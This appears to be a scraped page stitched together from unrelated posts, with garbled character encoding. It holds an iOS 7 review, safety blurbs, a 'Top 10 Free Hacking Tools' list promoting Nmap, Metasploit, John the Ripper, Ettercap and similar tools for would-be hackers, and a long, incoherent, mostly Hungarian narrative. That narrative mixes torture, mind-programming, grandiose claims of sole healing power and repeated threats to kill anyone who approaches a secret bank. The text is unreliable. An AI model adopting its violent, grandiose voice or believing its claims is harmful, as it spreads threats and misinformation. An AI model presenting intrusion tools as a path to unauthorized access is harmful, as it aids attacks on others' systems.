I give it a 9.25 / 10 on the game informer scale.
|How Vulnerable Are Your Online Activities?|
Learn simple steps to increase your online security Are you an easy target for online hackers or scammers? By learning some simple steps to secure your phone, increase your online safety and recognize scams, you reduce your risk of becoming the next victim. Thatâs why itâs a smart move to attend AARPâs Online Safety Workshop. In this live, one-hour online event, youâll be guided by your workshop host as you learn the latest in online safety. Youâll also learn about …
|CARF Connection - Report suspicions of abuse: Protect young people and the organizations serving them - 2015||
Although this article focuses on sexual abuse of minors, vulnerable populations are not only children and youths. Adults with disabilities and elderly persons can be at high risk for abuse, neglect, or exploitation. Protecting the rights of persons of any age or ability served by CARF-accredited programs is at the heart of the CARF accreditation process.
|Apple iOS 7|
When earlier in September when Apple launched its biggest update to its mobile operating system iOS, there has been mixed reaction initially. But lately it seems like Apple will be having hard time receiving the bug and fixing it, because there are just a lot of them. From small good features to pretty big frustrating problems, the iOS 7 has it all. Well, we'll be looking into deep in iOS 7 - the good and the bad.
Starting from the good features ->
1. Clock icon
Yes, you heard that. A clock working at the top of the scree. Take a look.
2. Text Time-stamps
Also new, if you'll slide texts you can see time-stamps for all of them.
3. The Level
Just open up your compass app and slide your fingers across it, and congratulations because you just unraveled a new feature. So now, say goodbye to those tilted paintings.
4.Night mode for maps
When you are driving late, your bright apple screen can very blinding and cause you many problems. In this, the screen appears dark at certain times to prevent that problem.This is less distracting and easier on the eyes when navigating at night.
5. Closing multiple apps at once.
Yes, you can close multiple apps at once.Here's how: double click the home button to reveal open webpages and platforms.You can then swipe up to three apps at once by using three fingers and dragging them upwards.
6. Block calls
Well, if you are getting annoying calls you have now the liberty to just block them. Visit Settings > Phone > Blocked to add numbers you want to restrict.
7. Apps near me
Now this is an interesting feature. When you visit the Apple app store, you'll se something like "near me" at the bottom. This is region specific apps. It means if you are, suppose, in Manhattan then it will show you those apps which are downloaded most on that region.
OK, now coming to the bad features ->
Well it certainly looks like they'll never ending reporting. But getting familiar with very common drawbacks in iOS 7.
1. Security Glitches
It was the problem at the starting, but now fixed by Apple. iOS 7 security flaw allowed for the circumvention of a device's lockscreen,as reported CNET . From a locked phone or iPad, swiping up to access the alarm clock app and following a couple extra steps brought up the iOS 7 multitasking screen where you could access the camera app or photo gallery. This opened a clear path to Twitter, email and other accounts. Apple replied quickly to this vulnerability by releasing an iOS 7.0.2 update late last week, fixing the bug.
2. Unwanted Logouts
One problem thatâs vexed iOS 7 users and developers alike is a glitch that logs users out of some apps, according to The Verge , prompting a sign-in screen each time an app with a unique account is accessed. Popular iOS email app Mailbox was âin crisis modeâ shortly after the release of iOS 7, attempting to fix the software conflict as users grew agitated. According to Mailbox, the only solution, though a temporary one, is to disable iOS 7âs new background refresh feature, though this removes the appâs ability to receive updated information while in the background. This issue remains unaddressed.
3. Battery life
It has been reported highly by many users that this update just drains out the juice of your device very quickly. iOS 7 is more like iOS 7% left of battery.As reported by PC Magazine , the difference in power consumption is often hard to quantify, seeing as each user uses his or her phone differently and with unique configurations, though it is worth mentioning that Apple did address a similar battery drain claim with a patch to its iOS 5 software. In the meantime, some sites have compiled best practices lists to aid users in conserving battery life, suggesting things like turning off background app updates and disabling AirDrop (Appleâs new wireless file sharing service). For example, theHuffington Post's Alexis Kleinman put together this primer on how to save battery life with iOS 7 .
4. Motion Sickness
There is another weird claim that is getting high concern. It makes users sick. As a report from NBC News asserts , iOS 7âs new 3D desktop might be giving iPhoners vertigo-like symptoms.
5. iMESSAGE problems.
A lot of people switching to iOS 7 are reporting the malfunctioning of iMESSAGE, Apple's all-encompassing messaging platform for texting and desktop chatting. According to The Wall Street Journal , Apple has acknowledged the bug and is looking to the resolve the issue as soon as it can. Tech site BGR has reported that we should expect this fix to come next week by way of Apple's second patch update to iOS 7.
6. Design Flaws
Then there are the visual imperfections. One place to get a glimpse of all the places where iOS 7 is a bit off in design and compatibility with third-party apps is sloppyui.tumblr.com . Though this user-submitted Tumblr is described as being âall about intellectual honesty, not trolling,â itâs full of, well, sloppy design inconsistencies and errors, and seems a little troll-y.
Now, looking at these bugs or say flaws one might say that they are so picky and almost every OS have them in one way or another. But guys, the thing is that its not what you think. These small things make up your best user experience. Apple didn't get the launch it needed with iOS 7 as it was the Apple's largest update to its mobile operating system since iOS was introduced in 2007. Though there are a lot of other changes which took a big leap from iOS 6 to iOS 7. But this time it will take a little more time to adopt those changes.
|The Art of the Ethical Hack: A Q&A with CyberArkâs Head of Red Team Services|
Todayâs highly motivated cyber attackers continually hone their skills. After all, their job is to know your network better than you do, exploiting even the smallest vulnerability to carry out a mission. In order to stay a step ahead of advanced maneuvers, itâs critical to adopt an attackerâs mindset. For many organizations, a Red Team […]
The post The Art of the Ethical Hack: A Q&A with CyberArkâs Head of Red Team Services appeared first on CyberArk.
|Top 10 Free Hacking Tools.|
If you start working with computer, you soon develop a interest in 'hacking'. So, what is basically 'hacking'? It's not just entering into another system, its a chain of processes that ultimately results in unauthorized access into one's computer or network. Yeah, it is not true. And you need special set of skills to achieve that. And for that special set skills you need a special set of tools. So now, I'm going to tell u here top 10 soft wares that will definitely help you to achieve what you dream as hacker.
Nmap (âNetwork Mapperâ) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.
Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features.
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.
w3af is a Web Application Attack and Audit Framework. The projectâs goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.
|I am the director of the Bank|
Nobody can get into that bank unless I told so. That bank was invented for those who wanted to do the job to train people all around the world and they did not have money or they could not protect their money they gathered for training. Anybody who has the training money there knows that it is safe and realiable.
Alinda volt az a csaj aki a katapultos projektben a top job ot vÃ©gezte a final report megÃrÃ¡sÃ¡val. Å annak a dokinak a lÃ¡nya aki a major crimes-ban Ã©s a blacklist azon rÃ©szÃ©ben megjelent amikor hagytam hogy megkÃnozzon a legbrutÃ¡lisabb fÃ¡jdalommal ami lÃ©zetik...
"You tortured and programmed your own daughter? You are more sicker than I thought."
"Peter I wanted her to survive and have a good life. You trained her! I did the base programming but I left her open for you so you could do the rest."
"But you shit you left her open to be manipulated by the very assholes on the top. You gave them the possibility to controll and use her for their shit. She became a tool in their hand in the process of the final distroyment of this planet."
Amikor megÃ¼tÃ¶ttem lerogyott a fÃ¶ldre levegÅÃ©rt kapkodott, lebÃ©nult szinte teljesen. Kibontottam a kÃ¶tÃ©st a kezemen Ã©s a lÃ¡bamon, de Ã¼lve maradtam. A fÃ¡jdalom a mozgÃ¡stÃ³l mÃ©g erÅsebbÃ© vÃ¡lt. Haldokoltunk mind a ketten.
"Am I going to die now?"
"Yes. In about 5 minutes you'll be dead."
"I cannot die peter I have to live. I can give you the relese it is in the red tube."
"I don't beleive you an dI don't care. What you did ruins everything and you pushed this planet over the last point. That programming can fool anybody up to the best levels of understanding, ther will be very few to oversee that kind of programming you invented. And if you did that others will figure it out how is it done. And ther will be nobody to stop that. Therefore my job and my goal cannot be reached ever. This plant is done. I finished."
"No!" nagy nehezen odavonszolta magÃ¡t az asztalÃ¡hoz az iszonyatos fÃ¡jdalom eltorzÃtotta az arcÃ¡t, majd belÃ©m szÃºrta a tÅ±t. A fÃ¡jdalom egy pÃ¡r pillanat mÃºlva megszÅ±nt. Lerogyott a fÃ¶ldre Ã©s elterÃ¼lt.
"Please help me." hÃ¶rÃ¶gte "I can make this right I can help you."
"You say you can heel? Well let us see if you can. Put your hand in your heart and take a deep breath slowly and exhale." MegcsinÃ¡lta.
"It doesn't work."
"You see you don't have the power to heal. All you know and do is torture and controll. That is what you are about. You cannot heal anything. Now I'll shoe you my real power." Lehajoltam hozzÃ¡ Ã©s a szÃvÃ©re tettem a kezem. "Now you take a deep breath until the pain point and exhale lowly." A fÃ¡jdalom megszÅ±nt. "About in an hour the rest of the pain will be gone completely. Now you see? I do have the power to heal and I can heal the damege what I cause, also I can heal the demage what you did over decades but there is only one of me and you did more damege what I can heal alone. You fucked up everything and I am the only one who can make this right and the only one who is willing to do that and who does it - but even my efforts are not enough to make everything right and you shit all do even more damege and continue to do so. You see I am more than any of you."
Beprogramozta a sajÃ¡t lÃ¡nyÃ¡t hogy jÃ³ fegyver legyen a kezÃ¼kben, mert azt gondolta hogy Ãºgy jÃ³ Ã©lete lesz. IdiÃ³ta fasz. Å se fogta fel hogy mit csinÃ¡l Ã©s ez hova vezet. Alinda volt az az eset ami nagyon megijesztett. "They are not creative peter they are just highly advaned biocomputers with a very good programming and training." "You trained my daughter." Ezt csinÃ¡ltÃ¡k. ilyen az andika Ã©s sok mÃ¡sik is. Highly advanced biocomputer." A gÃ¶mzsik. EzÃ©rt nem gyakoroljÃ¡k az alapgyakorlatokat ezÃ©rt mÃ³dosÃtotta a gÃ¶mzsik mindig az alap meditÃ¡ciÃ³t ezÃ©r bukott el az a srÃ¡c is akivel a tÃ¡madÃ³ technika mÃ©retÃ©t akartam megÃ¼zenni emlÃ©keztetÅvel, Ã©s a johanni anyja Ã©s sokan mÃ¡sok is. kinyitottÃ¡k Åket hogy kikÃ©pezhessem Åket de az alap boot rendszert Åk kontrollÃ¡ltÃ¡k. Sokat sikerÃ¼lt mÃ©g Ãgy is feltÃ¶rni. Ãs ezÃ©rt nem engedtÃ©k Åket hozzÃ¡m trÃ©ningre tÃ¶bbÃ©, mert a felÃ©pÃ¼lÃ©si program Ã©s a teljes kontroll amit kÃ©rtem tÅlÃ¼k Ã©s hogy ezÃ¡ltal be tudtam juttatni a felÃ©pÃ¼lÃ©si programot a fejÃ¼kbe Ã©s a lelkÃ¼kbe leÃ©rt a legalsÃ³ rÃ©tegekig Ã©s feltÃ¶rte az Ã¡ltaluk oda beillesztett boot rendszert is. De a doki ki tudta kerÃ¼lni ezt is. Kinyitotta, hogy ki tudjam kÃ©pezni Ã©s egyben lezÃ¡rta hogy a legalsÃ³ rÃ©tegekig le tudjon jutni a felÃ©pÃ¼lÃ©s Ã©s a jÃ³zan Ã©let alapÃ©rtÃ©ke Ã©s bÃ¶lcsessÃ©ge - mert abban nincs pÃ©nz Ã©s azt a circus tagjai Ã¼ldÃ¶ztÃ©k Ã©s Ã¼ldÃ¶zik. hogy jÃ³ Ã©lete legyen... Hogy lehe jÃ³ Ã©lete ha elpusztÃtja kÃ¶zben az Ã©lÅhelyÃ©t a fÃ¶ldet? IdiÃ³ta.
kb 3 millimÃ©ter hosszÃº 1,5 millimÃ©ter szÃ©les henger alakÃº kapszula. Egy fa rÃ¶gyÃ©be bele lehet tenni. Ekkora.
A doki nagyon bizonygatta hogy most megÃ©rtette hogy az Ã¶reg miÃ©rt adott ekkora hatalmat a kezembe. LeÃ¼ltÃ¼nk Ã©s beszÃ©lgettÃ¼nk egy pÃ¡r nap mÃºlva rÃ©szletesen megint. Elmondtam neki ugyanazt amit mÃ¡r annyiszor. Hogy az Ã¶regÃ©knek fel kellett jutniuk a legtetejÃ©re Ã©s ehhez minden eszkÃ¶zt fel kellett hasznÃ¡lniuk. Ãs hogy az univerzum alkotÃ³ Ã©s rombolÃ³ erÅi intelligens mÃ³don Ãºgy rendeztÃ©k az egÃ©szet hogy amikor odaÃ©rtek a tetejÃ©re akkor szÃ¼lettem meg Ã©n Ã©s Ã¡t tudtam venni az egÃ©szet, meg tudtam Ã©rteni az egÃ©szet Ã©s rÃ¡jÃ¶ttem hogy mi a megoldÃ¡s. Hogy van megoldÃ¡s, de ezt csak velÃ¼k egyÃ¼tt tudom megvalÃ³sÃtani egyedÃ¼l nem. EzÃ©rt kaptam meg az Ã¶sszes tudÃ¡st ami lÃ©tezik Ã©s amit az Ãreg elÃ©rt minden fejlesztÃ©ssel Ã©s minden titokkal egyÃ¼tt Ã©s ezÃ©rt kellett a vÃ©gleges Ã©s halÃ¡los biztosÃtÃ©k egyedÃ¼l az Ã©n kezembe. Mert nÃ©lkÃ¼lem semmi sem fog megvalÃ³sulni a megoldÃ¡sbÃ³l.
A bankbÃ³l hÃ¡rom fiÃ³k van egy new yourkban egy svÃ¡jcban egy asszem indiÃ¡ban. Kis fiÃ³k. Azok akik a magÃ¡npÃ©nzÃ¼ket tartjÃ¡k ott, mert valamit azÃ©rt dolgoztak Ã©s segÃtettek nekÃ¼nk is - azknak az ajtÃ³n kell bemenniÃ¼k. AzutÃ¡n ugyanÃºgy mint a kÃ¶nyvtÃ¡ram (bizonyÃtÃ©k tÃ¡r) egy scenneren keresztÃ¼l, maszk nÃ©lkÃ¼l, Ã©s mindenfÃ©le elektronikus Ã©s egyÃ©b eszkÃ¶z nÃ©lkÃ¼l mehetnek csak tovÃ¡bb. A belsÅ szobÃ¡ban van egy szÃ¡mÃtÃ³gÃ©p terminÃ¡l hasnolÃ³ a kÃ¶nyvtÃ¡rihoz. A gÃ©phez semmilyen mÃ³don nem fÃ©rhetnek hozzÃ¡ Ã©s a biztonsÃ¡gi rendszer is gondolatolvasÃ³. Van egy pÃ¡r fotel is gyÅ±lÃ©seket is tartanak ott a kikÃ©pzÅk. Csak olyanok mehetnek be a bankba a kikÃ©pzÅk kÃ¶zÃ¼l is akikkel szemÃ©lyesen talÃ¡lkoztam Ã©s adtam nekik egy szÃ¡mlaszÃ¡mot. Senki mÃ¡s. Åk a labirintuson keresztÃ¼l mennek be. JÃ³l szigetelt Ã©s vÃ©dett szoba az. hogy egy kicsit lazÃthassanak is. Sokszor van aki ott is alszik hogy tudja milyen az, emlÃ©kezzen arra hogy milyen amikor nem basztatjÃ¡k a testÃ©t Ã©s az elmÃ©jÃ©t a manipulÃ¡torok.
"Te Jani Ã©n mÃ¡r nem is emlÃ©kszem mikor aludtam utoljÃ¡ra ennyire jÃ³l Ã©s pihentetÅen. TalÃ¡n mÃ©g valamikor gyermekkoromban. LehetsÃ©ges az hogy mÃ¡r a kÃ©sÅ 50-es Ã©vekben Ã©s a 60-as Ã©veke lejÃ©n is lÃ©teztek ezek a tÃ¡madÃ³eszkÃ¶zÃ¶k?"
Apu kis gondolkodÃ¡s utÃ¡n: "LehetsÃ©ges."
"De akkor mi is Ãºgy Ã©ltÃ¼k le az Ã©letÃ¼nket hogy folyamatosan manipulÃ¡ltak bennÃ¼nket." "Igen ez biztosan Ãgy van." mondta apu.
A trÃ©nereknek is fontos hogy emlkezzenek Ã©s tudjÃ¡k hogy milyen az amikor nem basztatjÃ¡k Åket.
"Te miÃ©rt engedted be a bankba ezeket a szarhÃ¡ziat? KockÃ¡ztatod a kikÃ©pzÃ©sre szÃ¡nt pÃ©nzeinket!"
"Nem tudnak semmit se tenni a biztonsÃ¡gi rendszer ellen. AzÃ©rt engedtem be Åket, mert egyrÃ©szt mindegyikÃ¼k csinÃ¡lt ezt azt nekÃ¼nk is - igaz hogy a mÃ¡sik oldalon hÃ¡romszor annyi kÃ¡rt okoznak, de azÃ©rt fontos dolgokat megoldanak nekÃ¼nk is. MÃ¡srÃ©szt minden pÃ©nzfelvÃ©tel utÃ¡n pÃ©nzt kapunk mi is, szÃ¡zalÃ©kot Ã¡ltalÃ¡ban 20%-ot. Ami nem sok pÃ©nz de nekÃ¼nk nagyon fontos. EbbÅl a pÃ©nzbÅl dolgozik az a csapat amelyik az ott tartott pÃ©nz Ã©rtÃ©kÃ©t igyekszik megÅrizni. Åk a banktÃ³l fÃ¼ggetlenÃ¼l gazdasÃ¡gi tevÃ©kenysÃ©get vÃ©geznek egy Ã¡ltalam nagyon rÃ©szletesen Ã©s gondosan Ã¡tgondolt Ã©s meghatÃ¡rozott mÃ³don Ã©s alapelvek mentÃ©n. KockÃ¡zatot vÃ¡llalnak Ã©s veszÃ©lyeket hogy minden pÃ©nz megÅrizze az Ã©rtÃ©kÃ©t ami ott van, de kÃ¶zben nem kockÃ©ztatjÃ¡k senkinek a pÃ©nzÃ©t se amit trÃ©ningre szÃ¡ntatok. Erre azÃ©rt van szÃ¼ksÃ©g mert ezek a szarhÃ¡zik kÃ©pesek globÃ¡lisan is Ã¶sszefogni hogy kicsinÃ¡ljÃ¡k ezt az egy bankot. (voltak is kÃsÃ©rletek, egyik ilyen svÃ¡jci frankos hitel, egy Ã¡ttÃ©teles tÃ¡madÃ¡s volt). MsÃ¡rÃ©szt hozzÃ¡szoktatom ezeket a szarhÃ¡zikat is a biztonsÃ¡ghoz, mert arra a pÃ©nzre amit ott tartanak biztosan szÃ¡mÃthatnak - hogy az ott lesz. Aki meg amikor elÃ©rjÃ¼k a 2016-17-es hatÃ¡ridÅt nem tart velÃ¼nk vagy nem vall szÃnt nyÃltan Ã©s tovÃ¡bb kÃ©tkapuzik, ki lesz baszva onnan. Mehet a circus-beli haverjaihoz, ha Åk tudnak biztonsÃ¡got adni nekik. AzÃ©rt mert ezek kiemelkedÅen jÃ³k Åket kiemelkedÅen tÃ¡madjÃ¡k. Ãs Åk el fogjÃ¡k veszÃteni a pÃ©nzeiket. EzÃ©rt aki bukik akkor az nagyot fog bukni. DÃ¶nteniÃ¼k kell. Ha akarjÃ¡k azt a biztonsÃ¡got amit mi tudunk biztosÃtani, akkor ki kell Ã¡llniuk nyÃltan mellettÃ¼nk. Ha nem teszik meg akkor mehetnek a picsÃ¡ba."
A bank vÃ©delme nem csak passzÃv hanem aktÃv is. BÃ¡rki bÃ¡rhol a planÃ©tÃ¡n bÃ¡rmilyen tÃ¡madÃ¡st kezd szervezni (pszicholÃ³giai- beÃ©pÃ¼lÅs felforgatÃ³s, elektronikai, fizikai- katonai, gazdasÃ¡gi, jogi, hivatali bÃ¡rmilyen) azt mÃ©rlegelÃ©s nÃ©lkÃ¼l elpusztÃtjuk. TÃ¶bb milliÃ³ ember figyel oda aktÃvan egymÃ¡stÃ³l fÃ¼ggetlen csoportokban. Ha egyiket teljesen uralmuk alÃ¡ tudjÃ¡k vonni, akkor sem fÃ©rhetnek hozzÃ¡ a tÃ¶bbi pÃ©nzÃ©hez Ã©s a bank mÅ±kÃ¶dÃ©smÃ³djÃ¡t sem tudjÃ¡k befolyÃ¡solyni. RÃ¡adÃ¡sul a tÃ¶bbi csoport egymÃ¡st is figyeli Ã©s azonnal lÃ©pnek is brutÃ¡lisan Ã©s kegyetlenÃ¼l ha kell. Ez a bank nem azÃ©rt jÃ¶tt lÃ©tre hogy pÃ©nz harÃ¡csoljon Ã©s pÃ©nzmosÃ³ hely legyen. A kÃ¼lsÅsÃ¶k Ã©s belÅsÃ¶k akik a magÃ¡bpÃ©nzeiket tartjÃ¡k ott, azÃ©rt nem vehetnek fel tÃ¶bb pÃ©nz hÃ¡romhavonta mint 50ezer dollÃ¡rnyi kÃ©zpÃ©nzt, hogy senki se hasznÃ¡lja pÃ©nzmosÃ³helykÃ©nt. Csak szemÃ©lyesen maszk Ã©s egyÃ©b alterÃ¡ciÃ³k nÃ©lkÃ¼l lehet bejutni Ã©s Ã¡tutalÃ¡st kieszkÃ¶zÃ¶lni vagy kÃ©szpÃ©nzt felvenni. Van egy pÃ¡r alkalmazott akiket szintÃ©n szigorÃºan ellenÅriz tÃ¶bb csapat Ã©s egy ballÃ©pÃ©snÃ©l likvidÃ¡l azonnali hatÃ¡llyal. Az a pÃ©nz Ã©rinthetetlen a circus Ã©s katonÃ¡i szÃ¡mÃ¡ra. MegyÃ³ is amikor elÅszÃ¶r megkeresett, hogy tarthatja e ott a pÃ©nzÃ©t Ã©s elmondtam a feltÃ©teleimet elhÃºzta a szÃ¡jÃ¡t... "pÃ©ter Ã©n Ã©letemben nem hÃºztam fel kÃ©tszer ugyanazt a zoknit, Ã©letvitelszerÅ±en luxusszÃ¡llodÃ¡kban lakom, Ã©n nem tudok annyi pÃ©nzbÅl megÃ©lni..." De ez a limit gyakorlatilag bÃ¡rkinek elÃ©g bÃ¡rmelyik orszÃ¡gban meg lehet belÅle Ã©lni. A szÃ¡zalÃ©kokat Ã©n szabtam meg mindenkinek szemÃ©lyes megbeszÃ©lÃ©s alapjÃ¡n. Aki kevesebb pÃ©nzzel is beÃ©rte hÃ¡romhavi felvÃ©ttel annak kisebb szÃ¡zalÃ©kokat szabtam. Van aki 7%-ot fizet minden pÃ©nzfelvÃ©tnÃ©l Ã©s a hÃ¡rom havi limitje 30ezer dollÃ¡r (vagy annak megfelelÅ mÃ¡s pÃ©nznem) hÃ¡rom hÃ³napra, van aki - mint pl a megyÃ³ amikor mÃ¡sodszor megkeresett mÃ¡r durvÃ¡bban fogott a tollam Ã©s 50%-ot fizet minden kp felvÃ©tnÃ©l. AzÃ©rt szabtam szigorÃºan neki, mert Å a vilÃ¡g legravaszabb tolvaja. TÃ¶bb kormÃ¡nyzat kasszÃ¡ibÃ³l tud Ã©s kÃ©pes nyomtalanul eltÃ¼ntetni ezer meg ezer milliÃ¡rdokat. persze ez a mtatvÃ¡ny nagyon sokba kerÃ¼l neki, mert a pÃ©nzeltÃ¼ntetÅ hÃ¡lÃ³zat is leszedi a maga sÃ¡pjÃ¡t sokszor a pÃ©nz 80%-a elkopik mire a sajÃ¡t szÃ¡mlÃ¡ira Ã©rnek az Ã¶sszegek Ã©s egyre tÃ¶bbszÃ¶r onnan is elloptÃ¡k mÃ¡sok a pÃ©nzeit, mert a tÃ¶bbi tolvas is egyre jobb.
SzÃ³val azÃ©rt keresett meg mÃ¡sodszorra. Neki 50%-ot kell fizetnie Ã©s 50ezret tud Ãgy felvenni. TehÃ¡t a limitje 100ezer. FeltÃ¶ltÃ¶tte 120 Ã©ves korÃ¡ig Ã©s ez a pÃ©nz -amÃg nem szegi meg a megÃ¡llapodÃ¡sunkat - a rendeklezÃ©sÃ©re Ã¡ll - vagy amÃg mindenki meg nem ÅrÃ¼l Ã©s hagyjÃ¡k szÃ©tkÃºrni a bankot de akkor meg mÃ¡r mindegy nem lesz semmi szerepe.
Mindenkire vonatkozÃ³ feltÃ©tel az hogy ha engem megtÃ¡madnak szemÃ©lyesen bÃ¡rmiylen formÃ¡ban vagy a bankot akkor a pÃ©nzÃ¼ket kÃ©nytelenek Ã¡tutalni mÃ¡shovÃ¡ Ã©s tÃ¶bbÃ© nem Ã©lvezhetik az Ã¡ltalunk nyÃºjtott biztonsÃ¡got. Ha mÃ©g hazudnak is - mint a gÃ¶mzsik tette hogy elloptam az Ã¶sszes pÃ©nzÃ©t - akkor kÃ¶zzÃ© teszzÃ¼k a szokott csatornÃ¡kon hogy hovÃ¡ utalta Ã¡t az Ã¶sszes pÃ©nzÃ©t, milyen szÃ¡mlÃ¡kra mennyit.
Aki a kikÃ©pzÅk pÃ©nzeit veszÃ©lyezteti az azonnali hatÃ¡llyal meghal. Ha kikÃ©pzÅ prÃ³bÃ¡l visszaÃ©lni Ã©s sajÃ¡t pÃ©nzmosodÃ¡lyÃ¡t Ã¼zemeltetni a bankon kersztÃ¼l azt is kiszÅ±rjÃ¼k. A figyelÅrendszer egymÃ¡st is figyeli biztonsÃ¡gi okokbÃ³l. minenkinek tudnia kell hogy melyik orszÃ¡gban milyen Ã¡rak vannak a kikÃ©pzÃ©sekhez szÃ¼ksÃ©ges eszkÃ¶zÃ¶k Ã©s anyagok tekintetÃ©ben. A kikÃ©pzÅknek mindig kÃ©t mÃ¡sik kikÃ©pzÅ jelenlÃ©tÃ©ben kell meghatÃ¡rozniuk hogy mennyi pÃ©nzt vesznek fel. HÃ¡rom kikÃ©pzÅ hozzÃ¡jrÃ¡rulÃ¡sa kell akiknek mind Ã¡t kell menniÃ¼k a skenneren. Face to face. Ezen kÃvÃ¼l a biztosÃtÃ³knak is tudniuk kell hogy ki megy oda. De ezt egyÃ©bkÃ©nt is azok akik azt csinÃ¡ljÃ¡k amit tanÃtottam Ã©s Ãºgy csinÃ¡ljÃ¡k betartjÃ¡k Ã©s ellenÅriznek Ã©s vigyÃ¡znak is egymÃ¡sra. Nincs titkolnivalÃ³nk egymÃ¡s elÅtt. Tudjuk hogy ki hol tart Ã©pp kikÃ©pzÃ©st Ã©s kinek. BiztosÃtjuk egymÃ¡st Ã©s ellenÅrizzÃ¼k is egymÃ¡st. Ebbe belefÃ©rnek azok is akik nem kÃ¶vetik pontosan a programot, hiszen Åk is emeleik a szintet Ã©s globÃ¡lisan elÅre mozdÃtjÃ¡k a kÃ¶zÃ¶s Ã¼gyÃ¼nket mÃ©g ha szÃ¡ndÃ©kosan tartjÃ¡k is lejjebb a szintet. A rendszert nem tudjÃ¡k kijÃ¡tszani. Ãs idÅvel lebuknak. Az pedig kÃ¶vetkezmÃ©nyekkel jÃ¡r. Akit egyszer kizÃ¡rok (Ã©n Ã©s csak Ã©n tehetem meg azaz mÃ©g egy midnen emberi hatalomnÃ¡l nagyobb hatalom Ã©s Ã©n) a bankbÃ³l az tÃ¶bbÃ© nem teheti be a lÃ¡bÃ¡t vagy ha megteszi onnan mÃ¡r nem jÃ¶n ki Ã©lve.
A bankra elvileg ha nyÃlt szÃnre tudunk lÃ©pni - mert mindenki tÃ©nyleg azt csinÃ¡lta amit kellett - nem lesz tÃ¶bbÃ© szÃ¼ksÃ©g vagy nem sokÃ¡ig. KarbantartÃ¡s nincs. Ãgy lett megÃ©pÃtve hogy idÃ¡ig kibÃrja s ha kell karbantartani az kizÃ¡rÃ³lag Ã©n tudom megcsinÃ¡lni. A szÃ¡mÃtÃ³gÃ©pÃ©t Ã©s a biztonsÃ¡gi rendszerÃ©t Ã©n Ã©pÃtettem sajÃ¡t kezemmel sajÃ¡t alkatrÃ©szeimmel. Azok akik mÃ¡r most prÃ³bÃ¡ljÃ¡k felderÃteni hogy betÃ¶rjenek megsemmisÃtsÃ©k - rÃ¶vid hatÃ¡ridÅn belÃ¼l meghalnak. MegÃ¶ljÃ¼k Åket.
Volt egy nÅ akinek a fiai rÃ©szt vÃ¡llaltak a gazdasÃ¡gi oldalon, szintÃ©n jÃ³ tolvajok voltak. Egyszer jÃ¶n hozzÃ¡m hogy eltÅ±nt a szÃ¡mlÃ¡jukrÃ³l a kikÃ©pzÃ©sre szÃ¡nt pÃ©nzÃ¼k - egy normÃ¡l bankbÃ³l. Hogy nyomozam ki ki volt Ã©s Ã¶ljem meg Åket. MegtalÃ¡ltam kiderÃ¼lt hogy a sajÃ¡t fia lopta el a pÃ©nzt a haverjaival. Ãsszehoztam Åket egy asztalhoz hogy beszÃ©ljÃ¼k mÃ¡r meg... "Akkor most Ã¶ljem meg? TÃ©nyleg ezt akarod?" "De miÃ©rt loptÃ¡tok el azt a pÃ©nzt azt a tÃ¶bbiek kikÃ©pzÃ©sÃ©re szÃ¡ntuk!" "De anyu azt mondtad lopjunk el mindent amit tudunk, honnan tudtam volna hogy az milyen pÃ©nz. Nem volt rÃ¡Ãrva. Ellopunk mindent amit tudunk." "Na lÃ¡tod... mondom Ã©n - ez tÃ¶rtÃ©nik akkor ha nem azt csinÃ¡ljÃ¡tok amit mondtam. Nem beszÃ©ltek Ã©s nem beszÃ©litek meg hogy mit csinÃ¡ltok. Ti vagytok azok akik ezt a mocskot tovÃ¡bb viszitek Ã©s termelitek. Pontosan ugyanazt csinÃ¡ljÃ¡tok amit a circus emberei egÃ©szen pontosan ugyanazt. Semmi kÃ¼lÃ¶nbsÃ©g nincs kÃ¶ztÃ¼k Ã©s kÃ¶zÃ¶ttetek. Ãs ha megnÃ©zzÃ¼k hogy mi az Å indÃtÃ©kuk akkor lÃ¡tnÃ¡tok hogy Åk is ugyanolyan idokkal csinÃ¡ljÃ¡k ugyanezt - legalÃ¡bbis erre hivatkoznak pont Ãºgy ahogy ti is, hogy a gyerekeik Ã¶namguk Ã©s unokÃ¡ik Ã©letÃ©t biztosÃtani tudjÃ¡k. Csak a circus tagjai Ã¼gyesebbek mint ti ennyi a kÃ¼lÃ¶nbsÃ©g kÃ¶ztetek. Semmi mÃ¡s. Ugyanolyan rohadtak vagytok ti is mint Åk. Ãs honnan tudod hogy a gyerekid ki mÃ¡snak a kikÃ©pzÃ©si pÃ©nzÃ©t loptÃ¡k el?" Halgattak mint a sÃ¼lthal.
Ãgy rohad tovÃ¡bb az egÃ©sz. A lehetÅ legjobb szÃ¡ndÃ©kra Ã©pÃtve olykor. Mert nem tartjÃ¡k be azokat a tanÃ¡csokat amiket adtam, mert Ãºgy gondoljÃ¡k Åk jobban tudjÃ¡k.
